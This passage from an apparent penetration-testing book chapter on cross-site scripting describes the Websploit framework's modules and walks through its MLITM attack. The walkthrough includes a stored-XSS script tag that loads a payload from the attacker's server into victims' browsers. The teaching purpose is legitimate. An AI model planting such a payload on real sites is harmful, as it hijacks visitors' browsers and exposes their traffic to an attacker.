Metasploit's scope for scanning and exploiting capabilities is staggering, and with the open extensions through plugins and modules, it's obtained a well-earned reputation for
versatility and power. Sometimes, however, you are looking for a web application focus, and this is where a similar open-source framework called Websploit (https://sourceforg e.net/p/websploit/wiki/Home/) comes into play. Just like Metasploit, it offers a
command-line focused approach to calling and loading modules. It also shares the
extensibility through plugins and modules that has helped Metasploit stay at the forefront of pen testing tools, but instead of being an all-inclusive suite, it focuses on many of the vulnerabilities specific to our role as web penetration testers and ethical hackers.
The list of modules and plugins from their Wiki is a big giveaway as to its purpose:
Autopwn: This is borrowed from Metasploit to scan and exploit target services/servers
wmap: This can scan or crawl targets borrowed from Metasploit wmap plugin Format infector: This injects reverse and BIND payloads into the file format Phpmyadmin: This searches the target phpmyadmin login page
lfi: This can scan and bypass local file inclusion vulns and bypass some WAFs Apache users: This can search a server username directory (when used with Apache web servers)
Dir Bruter: Brute force target directory with wordlist Admin finder: Search admin and login page of target
Java applet attack: Java signed applet attack
MFOD attack vector: Middle Finger of Doom attack vector
USB infection attack: Create executable backdoor for infecting USB for Windows ARP DOS: ARP cache Denial of Service attack with random MAC
Web killer attack: Down your website on network (TCPKILL) Fake update attack: This can create a fake update page for target OS
Fake access point attack: This can create fake AP and sniff victims' information As this chapter is all about XSS, the DOM-based Man Left in the Middle (MLITM) attack is the tool we are after, so let's take a look at how we leverage the module. You'll want to download the latest version, extract it from the tarball, and then use the install script.
Once we've got it installed, we can simply invoke the websploit command from a terminal session, and it'll start up Websploit. From here, we'll want to use network/mlitm. As
modules go, you don't get simpler than the MLITM tool. There are no options to consider, as basically this module consists of a listening web server (similar to a handler) and a Python module (thebiz.py) that acts as a default payload. You can certainly craft other payloads; but much like any XSS attack, our goal is to place a script in the user's path that they trust, and then use it to redirect their browser to our attacking server, where this payload can be installed from and information or action can be orchestrated.
The script I used in this attack was pretty simple; we want to introduce the victim browser to our C2 server/attack box and allow the webserver, Websploit, which is running on a default port of 8000 for this purpose, to deliver the payload and establish our channel:
<script src=http://172.16.30.128:8000></script>
We place this on the same blog entry field we've used before, and before you know it, we have an unlucky victim come along and use that link (as shown in the following
screenshot):
Script entry and appearance to victims – simple but effective.
On our Kali box, we can see that we are delivering the payload and seeing the user's traffic through the referring link, as we are beginning to see in following screenshot. From here, you can feel free to experiment with payload alterations and achieving some of the control we've seen in other tools.
Websploit is a strong tool in other areas of the attack chain, and it does well with blended attack modules such as AutoPwn, DoS, and its WiFi-focused attacks. For XSS, I find that Metasploit offers more versatility in managing payloads and offering shell options. In addition to Meterpreter, there are more than a dozen other shell options depending on what your targets can get away with and what mix of stealth and functionality is desired.
Summary
XSS attacks have been a thorn in the side of security professionals and millions of victims since the explosion in dynamic content brought JavaScript into the forefront of web
development. Coupled with an antiquated means of establishing trust (entity-based with no validation of input), this has made XSS an OWASP Top 10 vulnerability for over 10 years. It is clear that something should be done to bring more attention to it, and it is the increased use of pen testing that can make the difference.
The tools for XSS are many, and while we covered some of the more accessible tools Kali included here, it became obvious to me in preparing to write this chapter that the toolsets experienced some ebb and flow; some tools have fallen out of favor over time while others seem to keep on fighting. Some of this might be attributed to corporate sponsorship – Rapid7 is a key player in maintaining and sponsoring Metasploit, while XSSer and
Websploit have both been sporadically supported. I would encourage delving into each of these tools and others as much as you can to get a good feel for which ones should be in your tool chest. It would be wise to have at least two tools for every role with different strengths and overlapping capabilities to help better cover-corner case scenarios.
In this chapter, we covered the types of XSS, their potential to do harm or help us in our pursuit of pwnership (hacker-speak for being able to compromise a site or target at will), and some great ways to use them to gain visibility into clients and their relationships with their server. XSS, as we also saw, can provide real black-hat attackers with a sinister foothold that allows them to manipulate system resources and spy on their victims. Where XSS focuses on exploiting the client-server trusted relationship to compromise the client, our next chapter will discuss both client-side attacks as well as how we can take advantage of that same trusted relationship to either control or coerce the server itself. These attacks are known broadly as injection attacks, and encompass some hot topics in the land of web application security such as HTML, SQL, XML, and even the oft-overlooked LDAP. At the conclusion of the next chapter, you will have a solid foundation of attacks to help find critical data leakage and host control vulns in the majority of applications and their clients.